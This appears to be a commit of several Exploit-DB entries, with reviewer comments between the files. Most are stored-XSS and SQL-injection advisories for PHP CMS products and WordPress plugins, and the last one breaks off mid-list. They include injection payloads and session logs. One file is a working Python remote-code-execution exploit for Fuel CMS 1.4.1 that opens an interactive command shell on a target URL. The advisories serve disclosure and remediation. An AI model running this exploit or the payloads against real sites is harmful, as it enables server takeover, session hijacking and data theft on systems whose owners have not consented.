Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
A simple PHP content management system for easy web content editing and publishing. Our PHP Content Management System script is designed
to provide you with powerful yet easy content administration tools. The smart CMS lets you create and manage multiple types of web sections
and easily embed them into your website. You can upload a wide range of files and add users with different user access levels. Get the
Developer License and customize the script to fit your specific needs.
(Copy of the Homepage:https://www.phpjabbers.com/simple-cms/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent input validation vulnerability in the PHPJabbers Simple CMS v5.0 web-application.
Affected Product(s):
====================
PHPJabbers
Product: PHPJabbers Simple CMS v5.0 - (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-28: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (Moderator Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the in the PHPJabbers Simple CMS v5.0 web-application.
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise
browser to web-application requests from the application-side.
The persistent vulnerability is located in the create (pjActionCreate) and update (pjActionUpdate) post method request.
Privileged authenticated accounts with ui access are able to inject own malicious script code as name for users.
The script code execution is performed after the inject via post method in the user list (pjAdminUsers).
Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external
redirects to malicious source and persistent manipulation of affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Create (Add)
[+] Update
Vulnerable Parameter(s):
[+] pjActionCreate
[+] pjActionUpdate
Affected Module(s):
[+] pjAdminUsers
Proof of Concept (PoC):
=======================
The persistent web vulnerability can be exploited by remote attackers with privilged user accounts with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Payloads
"><img src=evil.source onload=alert(document.cookie)>
"><img src=evil.source onload=alert(document.domain)>
--- PoC Session Logs (POST) [Add & Update]
https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionCreate
Host: phpjabbers-cms.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 178
Origin:https://phpjabbers-cms.localhost:8080
Connection: keep-alive
Referer:https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionCreate
Cookie: PHPSESSID=1u09ltqr9cm9fivco678g5rdk6; pj_sid=PJ1.0.9421452714.1630949247; pj_so=PJ1.0.8128760084.1630949247;
_gcl_au=1.1.1647551187.1630949248; __zlcmid=15wkJNPYavCwzgx; simpleCMS=5if2dl1gd2siru197tojj4r7u5;
pjd=f9843n906jef7det6cn5shusd1; pjd_1630949262_438=1
user_create=1&role_id=2&email=test@ftp.world&password=test2&name=r"><img src=evil.source onload=alert(document.cookie)>&section_allow=1&file_allow=1&status=T
-
POST: HTTP/1.1 303
Server: Apache/2.2.15 (CentOS)
Location: /1630949262_438/index.php?controller=pjAdminUsers&action=pjActionIndex&err=AU03
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
--
https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionUpdate
Host: phpjabbers-cms.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 180
Origin:https://phpjabbers-cms.localhost:8080
Connection: keep-alive
Referer:https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionUpdate&id=2
Cookie: PHPSESSID=1u09ltqr9cm9fivco678g5rdk6; pj_sid=PJ1.0.9421452714.1630949247; pj_so=PJ1.0.8128760084.1630949247;
_gcl_au=1.1.1647551187.1630949248; __zlcmid=15wkJNPYavCwzgx; simpleCMS=5if2dl1gd2siru197tojj4r7u5;
pjd=f9843n906jef7det6cn5shusd1; pjd_1630949262_438=1
user_update=1&id=2&role_id=2&email=test@test.de&password=test&name=r"><img src=evil.source onload=alert(document.cookie)>&section_allow=1&file_allow=1&status=T
-
POST: HTTP/1.1 303
Server: Apache/2.2.15 (CentOS)
Location:https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionIndex&err=AU01
Keep-Alive: timeout=10, max=83
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
https://phpjabbers-cms.localhost:8080/1630949262_438/evil.source
Host: phpjabbers-cms.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer:https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionIndex&err=AU03
Cookie: PHPSESSID=1u09ltqr9cm9fivco678g5rdk6; pj_sid=PJ1.0.9421452714.1630949247; pj_so=PJ1.0.8128760084.1630949247;
_gcl_au=1.1.1647551187.1630949248; __zlcmid=15wkJNPYavCwzgx; simpleCMS=5if2dl1gd2siru197tojj4r7u5;
pjd=f9843n906jef7det6cn5shusd1; pjd_1630949262_438=1
-
GET: HTTP/1.1 200 OK
Server: Apache/2.2.15 (CentOS)
Content-Length: 380
Keep-Alive: timeout=10, max=89
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Vulnerable Source: index.php?controller=pjAdminUsers (&action=pjActionIndex&err=AU03)
<select data-name="status" style="display: none;" class="pj-form-field pj-form-select pj-selector-editable"><option value="T">Active</option>
<option value="F">Inactive</option></select></td><td><a href="index.php?controller=pjAdminUsers&action=pjActionUpdate&id=1"
class="pj-table-icon-edit"></a></td></tr><tr class="pj-table-row-even" data-id="id_3"><td><input type="checkbox" name="record[]" value="3"
class="pj-table-select-row"></td><td class="pj-table-cell-editable">
<span class="pj-table-cell-label">r"><img src="evil.source" onload="alert(document.cookie)"></img></span>
<input type="text" data-name="name" style="display: none;" class="pj-form-field pj-form-text
pj-selector-editable" value="r"><img src=evil.source onload=alert(document.cookie)>"></td><td class="pj-table-cell-editable">
<span class="pj-table-cell-label">test@ftp.world</span><input type="text" data-name="email" style="display: none;"
class="pj-form-field pj-form-text pj-selector-editable" value="test@ftp.world"></td><td><span class="pj-table-cell-label">06-09-2021</span></td>
<td><span class="pj-table-cell-label"><span class="label-status user-role-editor">editor</span></span></td><td class="pj-table-cell-editable">
<span class="pj-table-cell-label pj-status pj-status-T">Active</span><select data-name="status" style="display: none;"
class="pj-form-field pj-form-select pj-selector-editable"><option value="T">Active</option><option value="F">Inactive</option></select></td>
<td><a href="index.php?controller=pjAdminUsers&action=pjActionUpdate&id=3" class="pj-table-icon-edit"></a>
<a href="index.php?controller=pjAdminUsers&action=pjActionDeleteUser&id=3" class="pj-table-icon-delete"></a></td></tr></tbody></table>
Reference(s):
https://phpjabbers-cms.localhost:8080/
https://phpjabbers-cms.localhost:8080/1630949262_438/
https://phpjabbers-cms.localhost:8080/1630949262_438/index.php
https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionUpdate
https://phpjabbers-cms.localhost:8080/1630949262_438/index.php?controller=pjAdminUsers&action=pjActionCreate
Credits & Authors:
==================
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
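Review bot: the `Vulnerable Parameter(s)` block (pjActionCreate, pjActionUpdate) names the controller actions, not the injected parameter; both session logs carry the payload in `name=r"><img ...`, so `name` belongs under parameters and the two actions under the modules list. The file also has no `Solution - Fix & Patch` section, unlike the Hotel Listing advisory in the same commit, and the vulnerable source makes the fix easy to state: the stored name is emitted raw both as text inside `<span class="pj-table-cell-label">` and inside the `value="..."` attribute of the hidden input, so the pjAdminUsers list view needs HTML/attribute encoding at both sinks (htmlspecialchars with ENT_QUOTES) rather than input filtering alone.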


@ -0,0 +1,276 @@
# Exploit Title: WordPress Plugin Hotel Listing 3 - 'Multiple' Cross-Site Scripting (XSS)
# Date: 2021-10-28
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://hotel.eplug-ins.com/
# Software Link: https://hotel.eplug-ins.com/hoteldoc/
# Version: v3
# Tested on: Linux
Document Title:
===============
Hotel Listing (WP Plugin) v3.x - MyAccount XSS Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2277
Release Date:
=============
2021-10-28
Vulnerability Laboratory ID (VL-ID):
====================================
2277
Common Vulnerability Scoring System:
====================================
5.3
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
Hotel, Motel , Bar & Restaurant Listing Plugin + Membership plugin using Wordpress with PHP and MySQL Technologie.
(Copy of the Homepage:https://hotel.eplug-ins.com/hoteldoc/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple persistent cross site vulnerabilities in the official Hotel Listing v3.x wordpress plugin web-application.
Affected Product(s):
====================
e-plugins
Product: Hotel Listing v3.x - Plugin Wordpress (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-08-19: Researcher Notification & Coordination (Security Researcher)
2021-08-20: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-28: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (Guest Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities has been discovered in the official Hotel Listing v3.x wordpress plugin web-application.
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to
web-application requests from the application-side.
The vulnerabilities are located in add new listing - address, city, zipcode, country and location input fields of the my-account module.
Remote attackers can register a low privileged application user account to inject own malicious script codes with persistent attack vector to
hijack user/admin session credentials or to permanently manipulate affected modules. The execute of the malicious injected script code takes
place in the frontend on preview but as well in the backend on interaction to edit or list (?&profile=all-post) by administrative accounts.
The request method to inject is post and the attack vector is persistent located on the application-side.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Add New Listing
Vulnerable Input(s):
[+] address
[+] city
[+] zipcode
[+] country
Affected Module(s):
[+] Frontend on Preview (All Listings)
[+] Backend on Preview (All Listings) or Edit
Proof of Concept (PoC):
=======================
The persistent web vulnerabilities can be exploited by remote attackers with privilged user accounts with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Exploitation: Payload
%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E
Vulnerable Source: new-listing
<div class=" form-group row">
<div class="col-md-6 ">
<label for="text" class=" control-label col-md-4 ">Address</label>
<input type="text" class="form-control col-md-8 " name="address" id="address" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
placeholder="Enter address Here">
</div>
<div class=" col-md-6">
<label for="text" class=" control-label col-md-4">Area</label>
<input type="text" class="form-control col-md-8" name="area" id="area" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
placeholder="Enter Area Here">
</div>
</div>
<div class=" form-group row">
<div class="col-md-6 ">
<label for="text" class=" control-label col-md-4">City</label>
<input type="text" class="form-control col-md-8" name="city" id="city" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
placeholder="Enter city ">
</div>
<div class=" col-md-6">
<label for="text" class=" control-label col-md-4">Zipcode</label>
<input type="text" class="form-control col-md-8" name="postcode" id="postcode" value="<[MALICIOUS SCRIPT CODE PAYLOAD!]>">>""
placeholder="Enter Zipcode ">
</div>
</div>
<div class=" form-group row">
<div class=" col-md-6">
<label for="text" class=" control-label col-md-4">State</label>
<input type="text" class="form-control col-md-8" name="state" id="state" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
placeholder="Enter State ">
</div>
<div class=" col-md-6">
<label for="text" class=" control-label col-md-4">Country</label>
<input type="text" class="form-control col-md-8" name="country" id="country" value="">>"<[MALICIOUS SCRIPT CODE PAYLOAD!]>"
placeholder="Enter Country ">
</div>
--- PoC Session Logs (POST) ---
http://hotel-eplug-ins.localhost:8000/wp-admin/admin-ajax.php
Host: hotel-eplug-ins.localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1603
Origin:http://hotel-eplug-ins.localhost:8000
Connection: keep-alive
Referer:http://hotel-eplug-ins.localhost:8000/my-account-2/?profile=new-listing
-
action=iv_directories_save_listing&form_data=cpt_page=hotel&title=test1&new_post_content=test2&logo_image_id=&feature_image_id=
&gallery_image_ids=&post_status=pending&postcats%5B%5D=&address=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&area=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&
city=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&postcode=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&
state=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&country=%22%3E%3Cimg%3E%2520%3Cimg+src%3D%22evil.source%22%3E&
latitude=&longitude=&new_tag=&phone=&fax=&contact-email=&contact_web=&award_title%5B%5D=&award_description%5B%5D=&
award_year%5B%5D=&menu_title%5B%5D=&menu_description%5B%5D=&menu_price%5B%5D=&menu_order%5B%5D=&room_title%5B%5D=&room_description%5B%5D=&room_price%5B%5D=&
room_order%5B%5D=&override_bookingf=no&booking_stcode=&youtube=&vimeo=&facebook=&linkedin=&twitter=&gplus=&pinterest=&instagram=&Rooms=&suites=&
Rating_stars=&CHECK_IN=&CHECK_out=&Cancellation=&Pets=&Children_and_Extra_Beds=&day_name%5B%5D=Monday+&day_value1%5B%5D=&
day_value2%5B%5D=&event-title=&event-detail=++&event_image_id=&user_post_id=&_wpnonce=50241bc992
-
POST: HTTP/1.1 200 OK
Server: nginx/1.18.0
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin:http://hotel-eplug-ins.localhost:8000
Access-Control-Allow-Credentials: true
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Content-Encoding: gzip
-
http://hotel-eplug-ins.localhost:8000/my-account-2/?&profile=all-post
Host: hotel-eplug-ins.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer:http://hotel-eplug-ins.localhost:8000/my-account-2/?profile=new-listing
-
GET: HTTP/1.1 200 OK
Server: nginx/1.18.0
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Location:http://hotel-eplug-ins.localhost:8000/my-account-2/?profile=all-post
Solution - Fix & Patch:
=======================
1. Encode and parse all vulnerable input fields on transmit via post method request
2. Restrict the input fields to disallow usage of special chars
3. Encode and escape the output content in the edit and list itself to prevent the execution point
Security Risk:
==============
The security risk of the persistent cross site scripting web vulnerability in the hotel listing application is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
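Review bot: the `Vulnerable Input(s)` list (address, city, zipcode, country) is inconsistent with the rest of the file: the description also names `location`, the POST body injects the payload into `address`, `area`, `city`, `postcode`, `state` and `country`, and the form field is `postcode`, not `zipcode`; list the six real field names so a fix is checked against every sink. In the solution section, item 2 (disallowing special chars) is not a dependable control for address data; the vulnerable source shows each value reflected raw inside `value="..."`, so attribute-context output escaping (esc_attr() in the plugin's templates) is the change that closes the bug, with sanitize_text_field() on save as defense in depth.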

63
exploits/php/webapps/50477.py Executable file

@ -0,0 +1,63 @@
# Exploit Title: Fuel CMS 1.4.1 - Remote Code Execution (3)
# Exploit Author: Padsala Trushal
# Date: 2021-11-03
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763
#!/usr/bin/python3
import requests
from urllib.parse import quote
import argparse
import sys
from colorama import Fore, Style
def get_arguments():
parser = argparse.ArgumentParser(description='fuel cms fuel CMS 1.4.1 - Remote Code Execution Exploit',usage=f'python3 {sys.argv[0]} -u <url>',epilog=f'EXAMPLE - python3 {sys.argv[0]} -u http://10.10.21.74')
parser.add_argument('-v','--version',action='version',version='1.2',help='show the version of exploit')
parser.add_argument('-u','--url',metavar='url',dest='url',help='Enter the url')
args = parser.parse_args()
if len(sys.argv) <=2:
parser.print_usage()
sys.exit()
return args
args = get_arguments()
url = args.url
if "http" not in url:
sys.stderr.write("Enter vaild url")
sys.exit()
try:
r = requests.get(url)
if r.status_code == 200:
print(Style.BRIGHT+Fore.GREEN+"[+]Connecting..."+Style.RESET_ALL)
except requests.ConnectionError:
print(Style.BRIGHT+Fore.RED+"Can't connect to url"+Style.RESET_ALL)
sys.exit()
while True:
cmd = input(Style.BRIGHT+Fore.YELLOW+"Enter Command $"+Style.RESET_ALL)
main_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+quote(cmd)+"%27%29%2b%27"
r = requests.get(main_url)
#<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">
output = r.text.split('<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">')
print(output[0])
if cmd == "exit":
break
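Review bot: the `if cmd == "exit": break` check sits after the request is sent, so typing `exit` is first passed to the target as a command and only then ends the loop; move the check before main_url is built. Two smaller points: the `#!/usr/bin/python3` shebang is on the ninth line, below the header comments, where the kernel ignores it, and `"http" not in url` accepts any string containing that substring (use url.startswith(("http://", "https://")) and strip a trailing slash so the path does not become `//fuel/pages/select/`); `sys.stderr.write("Enter vaild url")` also misspells valid and lacks a newline.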


@ -0,0 +1,44 @@
# Exploit Title: WordPress Plugin Popup Anything 2.0.3 - 'Multiple' Stored Cross-Site Scripting (XSS)
# Date: 03/11/2021
# Exploit Author: Luca Schembri
# Vendor Homepage: https://www.essentialplugin.com/
# Software Link: https://wordpress.org/plugins/popup-anything-on-click/
# Version: < 2.0.4
** Summary **
A user with a low privileged user can perform XSS-Stored attacks.
** Plugin description **
Popup Anything is the best popup builder and marketing plugin that
helps you get more email subscribers, increase sales and grow your
business.
Manage powerful modal popup for your WordPress blog or website. You
can add an unlimited popup with your configurations.
** Vulnerable page **
http://{WEBSITE}/wp-admin/post.php?post={ID}&action=edit
** PoC **
Go on the "Popup Anything - Settings" tab and select "Simple Link" as
"Link Type". Select "Link Test" and use this payload:
test" onclick="alert(1)
Save the popup and reload the page. Now click on "Link Text" and it
will execute the javascript code
The same attack can be exploited with "Button Text" and "Popup width" fields.
** Remediation **
Upgrade to 2.0.4 version or later
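Review bot: the summary ("A user with a low privileged user can perform XSS-Stored attacks") is ungrammatical and never states which WordPress role is needed to open post.php?post={ID}&action=edit for a popup, which is what sets the severity; name the minimum role. The date is written 03/11/2021 while the other files in this commit use ISO dates (2021-11-03). The payload `test" onclick="alert(1)` shows the value is reflected inside an HTML attribute without escaping; the remediation would read better with one sentence on what 2.0.4 changed, since the payload shows the needed fix is escaping these fields in attribute context on output.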


@ -0,0 +1,246 @@
# Exploit Title: Simplephpscripts Simple CMS 2.1 - 'Multiple' Stored Cross-Site Scripting (XSS)
# Date: 2021-10-19
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://simplephpscripts.com/simple-cms-php
# Version: 2.1
# Tested on: Linux
Document Title:
===============
Simplephpscripts Simple CMS v2.1 - Persistent Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2302
Release Date:
=============
2021-10-19
Vulnerability Laboratory ID (VL-ID):
====================================
2302
Common Vulnerability Scoring System:
====================================
5.3
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
The system could be used only in already existing websites to control their page sections and contents.
Just paste a single line of code on your web page section and start controlling it through the admin area.
Very simple installation - one step installation wizard. Option to include contents into web page sections
through php include, javascript or iframe embed. Any language support. WYSIWYG(text) editor to styling and
format contents of the sections. Suitable for web designers who work with Mobirise, Xara and other web builders.
(Copy of the Homepage: https://simplephpscripts.com/simple-cms-php )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent cross site scripting vulnerability in the Simplephpscripts Simple CMS v2.1 web-application.
Affected Product(s):
====================
Simplephpscripts
Product: Simple CMS v2.1 - Content Management System (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-09-03: Researcher Notification & Coordination (Security Researcher)
2021-09-04: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-19: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Full Authentication (Admin/Root Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the Simplephpscripts Simple CMS v2.1 web-application.
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise
browser to web-application requests from the application-side.
The persistent cross site web vulnerability is located in `name`, `username`, `password` parameters of the `newUser`
or `editUser` modules. Remote attackers with privileged application user account and panel access are able to inject
own malicious script code as credentials. The injected code executes on preview of the users list. The request method
to inject is post and the attack vector is persistent.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent
external redirects to malicious source and persistent manipulation of affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] newUser
[+] editUser
Vulnerable File(s):
[+] admin.php?act=users
Vulnerable Input(s):
[+] Name
[+] Username
[+] Password
Vulnerable Parameter(s):
[+] name
[+] username
[+] password
Affected Module(s):
[+] Users (act=users) (Backend)
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with privileged account and with low user interaction.
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.
PoC: Payload
"><img src='31337'onerror=alert(0)></img>
Vulnerable Source: admin.php?act=users
<tbody><tr>
<td class="headlist"><a href="admin.php?act=users&orderType=DESC&orderBy=name">Name</a></td>
<td class="headlist" width="23%"><a href="admin.php?act=users&orderType=DESC&orderBy=email">Email</a></td>
<td class="headlist" width="23%"><a href="admin.php?act=users&orderType=DESC&orderBy=username">Username</a></td>
<td class="headlist" width="23%">Password</td>
<td class="headlist" colspan="2">&nbsp;</td>
</tr>
<tr>
<td class="bodylist">c"><img src='31337'onerror=alert(0)></img></td>
<td class="bodylist">keymaster23@protonmail.com</td>
<td class="bodylist">d"><img src='31337'onerror=alert(0)></img></td>
<td class="bodylist">e"><img src='31337'onerror=alert(0)></img></td>
<td class="bodylistAct"><a href="admin.php?act=editUser&id=7" title="Edit"><img class="act" src="images/edit.png" alt="Edit"></a></td>
<td class="bodylistAct"><a class="delete" href="admin.php?act=delUser&id=7" onclick="return confirm('Are you sure you want to delete it?');"
title="DELETE"><img class="act" src="images/delete.png" alt="DELETE"></a></td>
</tr>
--- PoC Session Logs (POST) [Create] ---
https://simple-cms.localhost:8000/simplecms/admin.php
Host: simple-cms.localhost:8000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 141
Origin: https://simple-cms.localhost:8000
Connection: keep-alive
Referer: https://simple-cms.localhost:8000/simplecms/admin.php?act=newUser
Cookie: PHPSESSID=9smae9mm1m1misttrp1a2e1p23
act=addUser&name=c"><img src='31337'onerror=alert(0)></img>&email=tester23@test.de
&username=d"><img src='31337'onerror=alert(0)></img>
&password=e"><img src='31337'onerror=alert(0)></img>&submit=Add User
-
POST: HTTP/2.0 200 OK
server: Apache
content-length: 5258
content-type: text/html; charset=UTF-8
-
https://simple-cms.localhost:8000/simplecms/31337
Host: simple-cms.localhost:8000
Accept: image/webp,*/*
Connection: keep-alive
Referer: https://simple-cms.localhost:8000/simplecms/admin.php
Cookie: PHPSESSID=9smae9mm1m1misttrp1a2e1p23
-
GET: HTTP/2.0 200 OK
server: Apache
content-length: 196
content-type: text/html; charset=iso-8859-1
Reference(s):
https://simple-cms.localhost:8000/simplecms/admin.php
https://simple-cms.localhost:8000/simplecms/admin.php?act=newUser
Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
LUDWIG-ERHARD STRAßE 4
34131 KASSEL - HESSEN
DEUTSCHLAND (DE)

# Exploit Title: Simplephpscripts Simple CMS 2.1 - 'Multiple' SQL Injection
# Date: 2021-10-19
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://simplephpscripts.com/simple-cms-php
# Version: 2.1
# Tested on: Linux
Document Title:
===============
Simplephpscripts Simple CMS v2.1 - SQL Injection
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2303
Release Date:
=============
2021-10-19
Vulnerability Laboratory ID (VL-ID):
====================================
2303
Common Vulnerability Scoring System:
====================================
7.1
Vulnerability Class:
====================
SQL Injection
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
The system could be used only in already existing websites to control their page sections and contents.
Just paste a single line of code on your web page section and start controlling it through the admin area.
Very simple installation - one step installation wizard. Option to include contents into web page sections
through php include, javascript or iframe embed. Any language support. WYSIWYG(text) editor to styling and
format contents of the sections. Suitable for web designers who work with Mobirise, Xara and other web builders.
(Copy of the Homepage: https://simplephpscripts.com/simple-cms-php )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a remote sql-injection web vulnerability in the Simplephpscripts Simple CMS v2.1 web-application.
Affected Product(s):
====================
Simplephpscripts
Product: Simple CMS v2.1 - Content Management System (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-09-03: Researcher Notification & Coordination (Security Researcher)
2021-09-04: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-19: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Authentication Type:
====================
Restricted Authentication (Moderator Privileges)
User Interaction:
=================
No User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
A remote SQL injection vulnerability has been discovered in the Simplephpscripts Simple CMS v2.1 web application.
The vulnerability allows remote attackers to inject or execute their own SQL commands to compromise the DBMS
or file system of the application.
The SQL injection web vulnerability is located in the `newUser` and `editUser` functions of the `users` module in
the `admin.php` file. Remote attackers with privileged access to the panel are able to add users. If a user account
already exists, for example the admin account, each attempt to add the same name or email value results in an unfiltered
MySQL exception. The exception is neither filtered nor sanitized, which allows privileged attackers to inject and execute
their own SQL commands on the affected database management system. The request method to inject is POST and
the attack vector is non-persistent.
Exploitation of the SQL injection vulnerability requires user interaction and a privileged web application user account.
Successful exploitation of the remote SQL injection results in database management system, web server and web application compromise.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] newUser
[+] editUser
Vulnerable File(s):
[+] admin.php?act=users
Vulnerable Input(s):
[+] Name
[+] Username
[+] Password
Vulnerable Parameter(s):
[+] name
[+] username
